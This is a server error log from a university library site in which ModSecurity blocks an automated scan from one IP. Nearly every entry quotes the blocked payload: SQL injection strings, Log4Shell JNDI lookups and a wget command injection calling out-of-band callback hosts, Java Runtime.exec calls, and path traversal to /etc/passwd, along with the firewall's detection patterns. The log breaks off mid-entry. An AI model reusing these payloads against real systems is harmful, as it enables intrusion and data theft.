[Tue Aug 29 11:30:37.402710 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPENeMAAAAQ"]
[Tue Aug 29 11:30:37.584686 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAOH4UkAAAAH"]
[Tue Aug 29 11:30:37.639769 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAPDnycAAAAP"]
[Tue Aug 29 11:30:39.360612 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAPyOEAAAAAR"]
[Tue Aug 29 11:30:39.446538 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAOOuW8AAAAW"]
[Tue Aug 29 11:30:39.448631 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAOOuW8AAAAW"]
[Tue Aug 29 11:30:41.847895 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10ccCo-f0AAAPDnzYAAAAP"]
[Tue Aug 29 11:30:42.669558 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAOOuYcAAAAW"]
[Tue Aug 29 11:30:43.397789 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlgbcr35ci445fpb.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAPXApUAAAAi"]
[Tue Aug 29 11:30:43.456294 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAOOuYoAAAAW"]
[Tue Aug 29 11:30:44.341681 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAPmhNAAAAAV"]
[Tue Aug 29 11:30:45.410402 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAOKNqUAAAAK"]
[Tue Aug 29 11:30:46.326895 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10dsCo-f0AAAPmhNYAAAAV"]
[Tue Aug 29 11:30:47.383968 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAO878MAAAAF"]
[Tue Aug 29 11:30:47.475385 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAPv-HQAAAAM"]
[Tue Aug 29 11:30:47.604266 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPQkhUAAAAe"]
[Tue Aug 29 11:30:48.306547 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAO878YAAAAF"]
[Tue Aug 29 11:30:48.306830 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlgspwzrzd1ou1io.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPPSxkAAAAd"]
[Tue Aug 29 11:30:50.326834 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10esCo-f0AAAPpWe4AAAAI"]
[Tue Aug 29 11:30:50.437123 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAPPSyMAAAAd"]
[Tue Aug 29 11:30:51.365282 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAPpWfUAAAAI"]
[Tue Aug 29 11:30:51.393017 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlgn93siwip7j699.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAPOhbkAAAAa"]
[Tue Aug 29 11:30:52.377239 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAPMmDoAAAAY"]
[Tue Aug 29 11:30:52.386354 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPQkh8AAAAe"]
[Tue Aug 29 11:30:53.424359 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAPMmD8AAAAY"]
[Tue Aug 29 11:30:53.565264 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/account"] [unique_id "ZO10fcCo-f0AAAPDn1sAAAAP"]
[Tue Aug 29 11:30:54.410841 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAPDn18AAAAP"]
[Tue Aug 29 11:30:54.465743 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10fsCo-f0AAAPRNdoAAAAf"]
[Tue Aug 29 11:30:54.515003 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAO87@YAAAAF"]
[Tue Aug 29 11:30:55.399877 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10f8Co-f0AAAPDn2UAAAAP"]
[Tue Aug 29 11:30:56.309298 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag 